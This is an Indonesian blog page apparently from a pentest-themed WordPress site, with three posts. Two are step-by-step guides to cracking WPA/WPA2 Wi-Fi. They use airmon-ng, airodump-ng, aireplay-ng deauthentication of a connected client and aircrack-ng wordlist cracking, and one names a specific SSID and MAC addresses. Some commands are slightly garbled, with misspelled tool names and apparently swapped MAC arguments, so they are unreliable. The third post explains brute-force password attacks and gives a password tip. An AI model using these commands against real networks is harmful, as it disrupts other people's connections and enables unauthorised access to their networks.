./dev/sda /tmp/backtrack, Ppentest

Hack WPA/WP2 |wireless hacking|

1.Ubah Interface jadi monitoring mode

 #airmon-ng start wlan0

2.monitoring target

#airodump-ng -c <channel> –bssid <bssid target> -w psk <interfaces>

3. buka tab baru, monitoring tab nya jangan di tutup

4. PUTUSIN koneksi target :-p

#aireplay-ng –deauth 50 -a <bssid> -c <station id> <interfaces>

Tunggu si target diskonek, sampe si target konek nanti lo dapet handshake nya.

handshake dapet, tinggal eksekusi

#airkrack-ng -w /lokasi/word/lis/nya.txt -b <bssid> psk*.cap

 

note:

-c <channel> lo isi sama chanel si target, kalo lo punya basic wireless networking paham lah yg ini mah

–deauth 50 , nilai 50 bisa lo ganti. maksudnya tu seberapa banyak paket yg dikirim biar si target diskonek.

Os yang di pake backtrack/kali. lo juga bisa pake OS lain nya, yg bin nya .deb /.rpm. tapi mesti install paketan software yang diatas. gw sendiri pake ubuntu sama fedora security.

tanda handshake udah dapet, liat di terminal yang lagi memonitoring, nanti ada tulisan handshake nya.

 

 

Semoga berhasil

Advertisements
Standard
Linux, Networking, Ppentest

Wireless Deauth Attack!!

#Step 1 : Aktifkan Mode Monitor airmon-ng start wlan0

Output : Interface Chipset Driver

wlan0 Intel 3945ABG iwl3945 – [phy0]
(monitor mode enabled on mon0)

Ok kita telah sukses sejauh ini , output pada terminal menunjukan bahwa monitor mode telah di aktifkan pada interface mon0.

 

#Step 2 : Menangkap (dump) traffik pada akses point target dan lalu lintas paket data antara AP dan client yang sedang terkoneksi. “airodump-ng mon0”

Output:

#Step 3: HandShake

Tujuan kita dalam capturing ini sebenarnya adalah mencari handshake. Untuk mendapatkan nilai handshake kita harus mendiskoneksikan client yang sudah terkoneksi dengan baik ke AP target. ok saya tertarik pada client yang telah terkoneksi dengan AP dengan ssid ( ibteam-3g ) dengan bssid F4:EC:38:EB:FA:C6. Kita gunakan fasilitas aireply untuk melakukan deauth attack pada user dengan Mac .  1C:4B:D6:AB:85:8E  .

 

#Step 4 : Serang..!!!!!

aireplay-ng --deauth 1 -a 1C:4B:D6:AB:85:8E  . -c F4:EC:38:EB:FA:C6 mon0

Standard
./dev/sda /tmp/backtrack, Google.dork, Networking, Ppentest

Brute Force

Mendengar istilah ini waktu pertama kali terus terang saya langsung tertawa geli horor dan teringat salah satu tokoh antagonis kartun Popeye, yaitu si jahat Brutus thea euy.

Brute force attack atau dalam bahasa Indonesia disebut juga dengan Serangan brute force ini adalah sebuah teknik serangan terhadap sebuah sistem keamanan komputer yang menggunakan percobaan terhadap semua kunci password yang memungkinkan atau istilah gampangnya mungkin menggunakan Random password/ password acak. Pendekatan ini pada awalnya merujuk pada sebuah program komputer yang mengandalkan kekuatan pemrosesan komputer dibandingkan kecerdasan manusia. Istilah brute force sendiri dipopulerkan oleh Kenneth Thompson, dengan mottonya: “When in doubt, use brute-force” (jika ragu, gunakan brute-force).

Teknik yang paling banyak digunakan untuk memecahkan password, kunci, kode atau kombinasi. Cara kerja metode ini sangat sederhana yaitu mencoba semua kombinasi yang memungkinkan memecahkan tembok keamanan.

Sebuah password dapat dibongkar dengan menggunakan program yang disebut sebagai password cracker. Program password cracker adalah program yang mencoba membuka sebuah password yang telah terenkripsi dengan menggunakan sebuah algoritma tertentu dengan cara mencoba semua kemungkinan. Teknik ini sangatlah sederhana, tapi efektivitasnya luar biasa, dan tidak ada satu pun sistem yang aman dari serangan ini, meski teknik ini memakan waktu yang sangat lama, khususnya untuk password yang rumit.

Namun ini tidak berarti bahwa password cracker membutuhkan decrypt. Pada prakteknya, mereka kebayakan tidak melakukan itu. Umumnya, kita tidak dapat melakukan decrypt password-password yang sudah terenkripsi dengan algoritma yang kuat. Proses-proses enkripsi modern kebanyakan hanya memberikan satu jalan, di mana tidak ada proses pengembalian enkripsi. Namun, anda menggunakan tool-tool simulasi yang mempekerjakan algoritma yang sama yang digunakan untuk mengenkripsi password orisinal. Tool-tool tersebut membentuk analisa komparatif.

Program password cracker tidak lain adalah mesin-mesin ulet pintar. Ia akan mencoba kata demi kata dalam kecepatan tinggi. Mereka menganut “Azaz Keberuntungan”, dengan harapan bahwa pada kesempatan tertentu mereka akan menemukan kata atau kalimat yang cocok. Teori ini mungkin tepat mengena pada anda yang terbiasa membuat password asal-asalan. Dan memang pada kenyataannya, password-password yang baik itu lebih sulit untuk ditembus oleh program password seperti halnya password Cracker.

Saran: maka sebaiknya anda pergunakan password untuk segala sesuatu terutama untuk hal – hal yang sangat penting, semisalnya password kartu kredit anda, password Cpanel, password email, password PIN HP, dll.

Jika pada saat anda melakukan login ke Cpanel atau Email hosting anda dan menemukan pemberitahuan brute Force ini, maka segera laporkan kepada pihak berwajib Team support Webhosting anda untuk segera di cek penyelesaian solusinya.

Demikian, semoga dapat memberikan pencerahan.

Source: Wkipedia – ibolobolo.wordpress.com

Standard